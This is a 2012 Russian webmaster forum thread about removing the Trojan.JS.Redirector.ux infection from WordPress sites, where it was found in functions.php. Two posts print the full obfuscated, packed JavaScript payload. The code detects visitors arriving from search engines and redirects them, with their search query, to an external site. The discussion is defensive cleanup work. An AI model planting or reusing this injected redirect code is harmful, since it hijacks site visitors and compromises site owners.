Помощник
 |
|
|
|
|
Сообщение сайта
|
 Trojan.JS.Redirector.ux - где искать и как лечить? |
Тирасполь
|
Сообщение
#1
|
||
 Завсегдатай  Группа: Active User Сообщений: 550 Регистрация: 1.5.2011 Из: Тирасполь Поблагодарили: 264 раза Репутация:  68 
 |
|
||
 |
|
||
|
ZonaObmena
|
 20.3.2012, 21:33;
Ответить: ZonaObmena
Сообщение
#2
|
 Новичок Группа: User Сообщений: 32 Регистрация: 9.2.2012 Поблагодарили: 6 раз Репутация: 0
|
Описание у Касперского, возможно пригодится: http://www.securelist.com/ru/descriptions/12401046
-------------------- |
|
|
|
|
Тирасполь
|
Сообщение
#3
|
|
Завсегдатай Группа: Active User Сообщений: 550 Регистрация: 1.5.2011 Из: Тирасполь Поблагодарили: 264 раза Репутация: 68
|
ZonaObmena, да вроде это что-то другое, у Касперского даже нет описания этой модификации
|
|
|
|
|
ZonaObmena
|
20.3.2012, 22:07;
Ответить: ZonaObmena
Сообщение
#4
|
|
Новичок Группа: User Сообщений: 32 Регистрация: 9.2.2012 Поблагодарили: 6 раз Репутация: 0
|
Да я видел, но класс вирусов один и тот же. Возможно, немного полезно будет.
-------------------- |
|
|
|
|
serg5777
|
20.3.2012, 23:23;
Ответить: serg5777
Сообщение
#5
|
 В активном поиске 
 Группа: Active User Сообщений: 4722 Регистрация: 5.4.2009 Из: Ростов-на-Дону Поблагодарили: 1495 раз Репутация: 205
|
Тут почитайте, может GreenMan уже нашёл решение проблемы.
|
|
|
|
|
Тирасполь
|
Сообщение
#6
|
|
Завсегдатай Группа: Active User Сообщений: 550 Регистрация: 1.5.2011 Из: Тирасполь Поблагодарили: 264 раза Репутация: 68
|
Всем спасибо. Вроде засланец нашёлся.
Сидел в functions.php Благо, яндекс пока не среагировал. Вот кусок этой заразы: Развернуть/Свернуть
"<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e©+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query
||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locati o n'.split('|'),0,{}))</script>" |
|
|
|
|
GreenMan
|
20.3.2012, 23:57;
Ответить: GreenMan
Сообщение
#7
|
 Бывалый Группа: User Сообщений: 444 Регистрация: 28.6.2011 Из: Home Поблагодарили: 81 раз Репутация: 12
|
(Тирасполь @ 20.3.2012, 22:44)  Сидел в functions.php У меня такое же было 3 дня назад сразу на 3-х сайтах. Нашел, удалил, но сегодня Яндекс обнаруживает еще какой-то вредоносный код на двух других сайтах, проверил functions.php - уже ничего нет и больше ничего не могу найти.  Какая-то атака мать их. 
-------------------- |
|
|
|
|
Тирасполь
|
Сообщение
#8
|
|
Завсегдатай Группа: Active User Сообщений: 550 Регистрация: 1.5.2011 Из: Тирасполь Поблагодарили: 264 раза Репутация: 68
|
GreenMan, сегодня довелось услышать, что он во всех php-файлах прописывается. Посмотрел у себя, оказалось нет. Хоть это хорошо. Я, впринципе, уверен, что он ещё полезет. Главное, чтобы с наименьшими потерями победить это зло.
|
|
|
|
ushi_dizel
|
5.4.2012, 17:44;
Ответить: ushi_dizel
Сообщение
#9
|
|
Новичок Группа: Viewer Сообщений: 3 Регистрация: 1.12.2010 Поблагодарили: 0 раз Репутация: 0
|
Если во всех, то во всех index.php, например. Также может прописаться во всех файлах .js, и не только скриптах темы, но и всего wordpress. Поэтому, чем быстрее вылечить , тем лучше.
Касательно этого трояна, может пригодится: Найти и удалить Trojan.JS.Redirector.ux. Новое имя старого знакомого |
|
|
|
ropique
|
9.4.2012, 11:20;
Ответить: ropique
Сообщение
#10
|
 Бывалый Группа: User Сообщений: 386 Регистрация: 29.10.2011 Поблагодарили: 41 раз Репутация: 21
|
У меня та же проблема(( вот в в файле funkcions есть такой код. Это он??
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query
||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locati o n'.split('|'),0,{}))</script>"; |
|
|
|
|
|
Похожие темы
| Тема | Ответов | Автор | Просмотров | Последний ответ | |
|---|---|---|---|---|---|
 |
Как в пушсетках покупают по 100-200 тысяч кликов за день? | 2 | Boymaster | 690 | Вчера, 17:52 автор: Boymaster |
 |
Как вы отдыхаете от работы за компом | 151 | adw-kupon.ru | 19855 | 23.4.2024, 13:52 автор: Vmir |
|
Как вы бросили работу и перешли на заработок с сайтов? | 20 | uahomka | 3467 | 23.4.2024, 11:54 автор: Skyworker |
|
Как вывести деньги в Украине с заблокированного Юмани ? | 30 | freeax | 5039 | 20.4.2024, 16:49 автор: Liudmila |
|
Арбитражники, как ведете учет расходов и доходов? | 13 | Boymaster | 2034 | 20.4.2024, 15:06 автор: Boymaster |
|
Текстовая версия | Сейчас: 25.4.2024, 9:15 |
